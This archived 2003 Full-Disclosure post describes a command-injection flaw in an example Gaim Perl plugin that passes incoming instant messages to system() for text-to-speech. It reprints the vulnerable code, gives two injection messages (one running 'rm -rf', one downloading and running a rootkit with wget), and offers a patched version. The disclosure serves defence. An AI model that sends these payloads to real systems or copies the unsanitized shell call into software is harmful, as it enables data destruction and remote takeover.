[Full-Disclosure] Gaim festival plugin exploit

2003-10-15T00:00:00
ID SECURITYVULNS:DOC:5245
Type securityvulns
Reporter Securityvulns
Modified 2003-10-15T00:00:00

Description

It has come to my attention that people have actually used this example code for a gaim plugin:

AIM::register("Festival TTS", "0.0.1", "goodbye", ""); AIM::print("Perl Says", "Loaded Festival TTS"); AIM::command("idle", "60000") if ($pro ne "Offline"); AIM::add_event_handler("event_im_recv", "synthesize");

sub goodbye { AIM::print("Module Unloaded", "Unloaded Festival TTS"); }

sub synthesize { my $string = $_[0]; $string =~ s/\<.?\>//g; $string =~ s/\".\"//; system("echo \"$string\" | /usr/bin/festival --tts"); }

As taken from: http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl

This has to be one of the most amusing ways to gain a local users privileges I have ever seen by an "Expert (TM)"

Exploit code? You have a shell through gaim with that.

Just pass it this message (or really any message for that matter):

Hey, I just wanted to exploit your box, do you mind?"; rm -rf;

Or perhaps:

Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x rootkit;./rootkit

Perhaps someone should ask:

"(Is s/[^\w]//g really that hard to do?!)"

So a fixed version would look like this:

AIM::register("Festival TTS", "0.0.1", "goodbye", ""); AIM::print("Perl Says", "Loaded Festival TTS"); AIM::command("idle", "60000") if ($pro ne "Offline"); AIM::add_event_handler("event_im_recv", "synthesize");

sub goodbye { AIM::print("Module Unloaded", "Unloaded Festival TTS"); }

sub synthesize { my $string = $_[0]; $string =~ s/\<.?\>//g; $string =~ s/\".\"//; $string =~ s/[^\w]//g; system("echo \"$string\" | /usr/bin/festival --tts"); }

Just a minor comment, nothing special.

error <error@lostinthenoise.net>